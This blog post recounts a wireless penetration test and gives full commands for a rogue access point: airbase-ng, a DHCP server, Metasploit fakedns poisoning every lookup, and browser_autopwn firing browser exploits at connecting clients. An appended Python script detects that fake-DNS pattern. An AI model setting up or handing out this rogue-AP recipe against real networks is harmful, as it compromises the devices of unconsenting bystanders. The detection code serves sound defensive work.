Thursday, February 6, 2014

Autopwning Rogue Access Point FTW

I recently had the opportunity to conduct an internal wireless pen test. Karmetasploit is an awesome script, but it can be a headache to set up, as it requires a few different components in order to work. So I stripped out what I wanted and came up with my own version of an Autopwning Rogue Access Point.

Basic requirements:

Aircrack-ng suite - You can find it here (compiling from source is recommended)
Linux system with a wireless card
isc-dhcp-server (sudo apt-get install isc-dhcp-server)
Metasploit

Place the wireless card into monitor mode:
sudo airmon-ng start wlan0

Spin up the Rogue AP:
sudo airbase-ng -e "pwn_me" -v mon0

Create a new network for victims (note that the addressing can be any private range: 10.x.x.x, 172.16.x.x or 192.168.x.x). Note that the forwarding sysctl must be written as root; with a plain "sudo echo '1' > ..." the redirection is performed by your unprivileged shell and fails, so pipe through tee instead:
sudo ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sudo route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

If you're using UFW, allow inbound connections on UDP port 53:
sudo ufw allow 53/udp

Edit the "/etc/dhcp/dhcpd.conf" file and add or replace its contents with the config below:
-----DHCP CONFIG-----
## /etc/dhcp/dhcpd.conf
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
-----DHCP CONFIG-----

Restart the DHCP server:
sudo service isc-dhcp-server restart

Fire up Metasploit and launch the browser_autopwn module (this will take some time):
msf > use auxiliary/server/browser_autopwn

Set the variables:
set LHOST 10.0.0.1
set SRVHOST 10.0.0.1
set SRVPORT 80
set URIPATH /

Launch the fakedns module:
msf > use auxiliary/server/fakedns

Set the variables:
set SRVHOST 10.0.0.1
set SRVPORT 53
set TARGETACTION FAKE
set TARGETDOMAIN *
set TARGETHOST 10.0.0.1

Ok, we're ready to rock. The rogue AP is set up. What we have done is create a wireless access point, a DHCP server, a DNS server and a web server. A victim connecting to the rogue AP will get an IP address. Then, when the victim attempts to connect out to a website, Metasploit will intercept the DNS request and poison the response (with the AP's IP). Metasploit is listening on TCP port 80 for incoming connections, ready to execute a barrage of browser (and plugin) exploits against the victim. It's important to note that if you are using a host-based firewall, you will have to open the reverse connection port to your system, the web port, and DNS.
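Seen from the defender's side, the tell of this setup is exactly what the paragraph above describes: the DHCP-assigned resolver is the gateway itself, and every name a client asks for, internal or external, comes back as that one private address. The script below is an added example, not part of the original post, that checks DHCP lease data and a DNS answer log for that pattern. The log format, the sample lease and log lines, and the function names are assumptions made for illustration.

```python
"""Flag the 'everything resolves to the gateway' pattern of a rogue AP with a fake DNS server.

Added example, not from the original post. The lease dict, the "<name> A <ip>" log
format and all sample values below are constructed for illustration.
"""
import ipaddress
import re
from collections import Counter

# Constructed sample: lease as handed out by a rogue AP's dhcpd (router == DNS server).
SAMPLE_LEASE = {"router": "10.0.0.1", "dns": "10.0.0.1"}

# Constructed sample DNS client log, hypothetical format "<name> A <answer>".
SAMPLE_DNS_LOG = """\
www.example.com A 10.0.0.1
mail.example.org A 10.0.0.1
update.vendor.test A 10.0.0.1
cdn.example.net A 10.0.0.1
not a valid line
"""

# Constructed sample of a normal network: resolver is still the gateway, answers differ.
NORMAL_DNS_LOG = """\
www.example.com A 93.184.216.34
mail.example.org A 198.51.100.7
update.vendor.test A 203.0.113.9
cdn.example.net A 192.0.2.44
"""

LINE_RE = re.compile(r"^(?P<name>[A-Za-z0-9.-]+)\s+A\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")


def parse_dns_log(text):
    """Return a list of (name, answer_ip) tuples, skipping blank, comment and malformed lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        try:
            ipaddress.ip_address(m.group("ip"))  # reject things like 999.1.1.1
        except ValueError:
            continue
        records.append((m.group("name").lower().rstrip("."), m.group("ip")))
    return records


def sinkhole_fraction(records, sink_ip):
    """Fraction of distinct queried names that were answered with sink_ip."""
    names = {name for name, _ in records}
    if not names:
        return 0.0
    sinkholed = {name for name, ip in records if ip == sink_ip}
    return len(sinkholed) / len(names)


def analyze(lease, dns_log, threshold=0.8, min_names=3):
    """Combine the DHCP and DNS signals into one verdict.

    A gateway acting as resolver is normal on its own (most home routers do it);
    what is not normal is that resolver being a private address that nearly every
    distinct name resolves to. Both conditions must hold to mark the network suspicious.
    """
    records = parse_dns_log(dns_log)
    resolver = lease["dns"]
    names = {name for name, _ in records}
    fraction = sinkhole_fraction(records, resolver)
    gateway_is_resolver = lease["router"] == resolver
    resolver_is_private = ipaddress.ip_address(resolver).is_private
    top = Counter(ip for _, ip in records).most_common(1)
    top_ip, top_count = top[0] if top else (None, 0)
    suspicious = (
        gateway_is_resolver
        and resolver_is_private
        and len(names) >= min_names
        and fraction >= threshold
    )
    return {
        "distinct_names": len(names),
        "gateway_is_resolver": gateway_is_resolver,
        "resolver_is_private": resolver_is_private,
        "sinkholed_fraction": fraction,
        "most_common_answer": top_ip,
        "most_common_count": top_count,
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    for label, log in (("rogue", SAMPLE_DNS_LOG), ("normal", NORMAL_DNS_LOG)):
        print(label, analyze(SAMPLE_LEASE, log))
```

On a real client you would feed the lease values from the DHCP client (the gateway and resolver it was handed) and the answer log from a stub resolver or packet capture; the threshold and minimum name count are there so that a single captive-portal redirect does not trip the check while a resolver that answers everything with itself does.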